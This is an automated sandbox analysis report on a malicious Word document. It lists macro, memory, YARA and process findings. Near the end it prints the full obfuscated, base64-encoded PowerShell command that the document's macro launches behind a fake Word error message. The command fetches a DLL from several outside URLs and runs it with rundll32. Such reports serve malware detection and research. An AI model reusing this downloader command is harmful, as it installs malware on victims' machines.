Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String oLweAMoGsqVE
Very long command line found
Source: unknown Process created: Commandline size = 5709
Source: unknown Process created: Commandline size = 5613
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5613
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Shuwftk\
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F7F1F 11_2_002F7F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F5D1D 11_2_002F5D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F8D1C 11_2_002F8D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F511B 11_2_002F511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F2B16 11_2_002F2B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002EB112 11_2_002EB112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002EC769 11_2_002EC769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F0B68 11_2_002F0B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002E8F78 11_2_002E8F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002E5B79 11_2_002E5B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002EE377 11_2_002EE377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F1773 11_2_002F1773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F2349 11_2_002F2349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F8F49 11_2_002F8F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F9B45 11_2_002F9B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002EB75F 11_2_002EB75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002E6754 11_2_002E6754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002E17AC 11_2_002E17AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F73AC 11_2_002F73AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002E69A0 11_2_002E69A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F6DB9 11_2_002F6DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F61B8 11_2_002F61B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F878F 11_2_002F878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002EF98C 11_2_002EF98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F9586 11_2_002F9586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002E6D9F 11_2_002E6D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002E839D 11_2_002E839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002E7998 11_2_002E7998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F71EF 11_2_002F71EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002ED7EB 11_2_002ED7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F67E9 11_2_002F67E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F3FE7 11_2_002F3FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F31E2 11_2_002F31E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F1BDF 11_2_002F1BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002E9FDC 11_2_002E9FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021B41F 12_2_0021B41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00212C63 12_2_00212C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021EE78 12_2_0021EE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021568E 12_2_0021568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00223895 12_2_00223895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002202C3 12_2_002202C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021C0C6 12_2_0021C0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002242DA 12_2_002242DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00218736 12_2_00218736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00217B63 12_2_00217B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00224B41 12_2_00224B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002263C1 12_2_002263C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00212A30 12_2_00212A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00214A35 12_2_00214A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00219A37 12_2_00219A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022340A 12_2_0022340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00227A0F 12_2_00227A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00225A61 12_2_00225A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022687F 12_2_0022687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021F444 12_2_0021F444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021EA4C 12_2_0021EA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021E05A 12_2_0021E05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002162A3 12_2_002162A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022A0AF 12_2_0022A0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002160B9 12_2_002160B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002180BA 12_2_002180BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002148BD 12_2_002148BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00211280 12_2_00211280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022889D 12_2_0022889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002212E2 12_2_002212E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002188E5 12_2_002188E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002226F5 12_2_002226F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00211CFA 12_2_00211CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002220C5 12_2_002220C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002196CD 12_2_002196CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00228ADC 12_2_00228ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00220D33 12_2_00220D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021F536 12_2_0021F536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021BB3A 12_2_0021BB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021153C 12_2_0021153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00227D03 12_2_00227D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00220F0C 12_2_00220F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021B112 12_2_0021B112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00222B16 12_2_00222B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022511B 12_2_0022511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00227F1F 12_2_00227F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00228D1C 12_2_00228D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00225D1D 12_2_00225D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021C769 12_2_0021C769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00220B68 12_2_00220B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00221773 12_2_00221773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021E377 12_2_0021E377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00215B79 12_2_00215B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00218F78 12_2_00218F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00229B45 12_2_00229B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00222349 12_2_00222349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00228F49 12_2_00228F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00216754 12_2_00216754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021B75F 12_2_0021B75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002169A0 12_2_002169A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002117AC 12_2_002117AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002273AC 12_2_002273AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002261B8 12_2_002261B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00226DB9 12_2_00226DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00229586 12_2_00229586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022878F 12_2_0022878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021F98C 12_2_0021F98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00217998 12_2_00217998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021839D 12_2_0021839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00216D9F 12_2_00216D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002231E2 12_2_002231E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00223FE7 12_2_00223FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021D7EB 12_2_0021D7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002267E9 12_2_002267E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002271EF 12_2_002271EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00221BDF 12_2_00221BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00219FDC 12_2_00219FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001FB41F 13_2_001FB41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00205A61 13_2_00205A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F2C63 13_2_001F2C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F60B9 13_2_001F60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002002C3 13_2_002002C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F1CFA 13_2_001F1CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F153C 13_2_001F153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00207D03 13_2_00207D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F8736 13_2_001F8736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00202B16 13_2_00202B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00208D1C 13_2_00208D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00204B41 13_2_00204B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F5B79 13_2_001F5B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001FE377 13_2_001FE377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00202349 13_2_00202349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001FC769 13_2_001FC769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002031E2 13_2_002031E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F9FDC 13_2_001F9FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F9A37 13_2_001F9A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0020340A 13_2_0020340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F4A35 13_2_001F4A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F2A30 13_2_001F2A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00207A0F 13_2_00207A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001FE05A 13_2_001FE05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001FEA4C 13_2_001FEA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001FF444 13_2_001FF444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0020687F 13_2_0020687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001FEE78 13_2_001FEE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0020A0AF 13_2_0020A0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F568E 13_2_001F568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F1280 13_2_001F1280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F48BD 13_2_001F48BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F80BA 13_2_001F80BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00203895 13_2_00203895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F62A3 13_2_001F62A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0020889D 13_2_0020889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002012E2 13_2_002012E2
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: MAIL-0573188.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module A5gd21klfqu9c6rs, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: MAIL-0573188.doc OLE indicator, VBA macros: true
Yara signature match
Source: 00000005.00000002.2098977444.00000000003A6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2099018850.0000000001BC6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@22/8@6/6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F1C88 CreateToolhelp32Snapshot, 13_2_001F1C88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString, 7_2_10002D70
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$IL-0573188.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC5DD.tmp Jump to behavior
Source: MAIL-0573188.doc OLE indicator, Word Document stream: true
Source: MAIL-0573188.doc OLE document summary: title field not present or empty
Source: MAIL-0573188.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ............h........................... .-.......-...............!.......!.............#...............................h.......5kU.......!..... Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ............h...$...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......8.!.....L.................!..... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K......(.Q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................*..j....................................}..v.... Z......0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................*..j..... ..............................}..v.....Z......0...............(.Q.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....xg......0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......Q.............................}..v.....h......0.................Q.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............z..j....................................}..v............0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............z..j..... ..............................}..v....P.......0.................Q.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'...............J..j.....(..............................}..v............0.................Q.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....+...............J..j.....(..............................}..v....P.......0.................Q.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: MAIL-0573188.doc Virustotal: Detection: 66%
Source: MAIL-0573188.doc Metadefender: Detection: 47%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkA
KQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQ
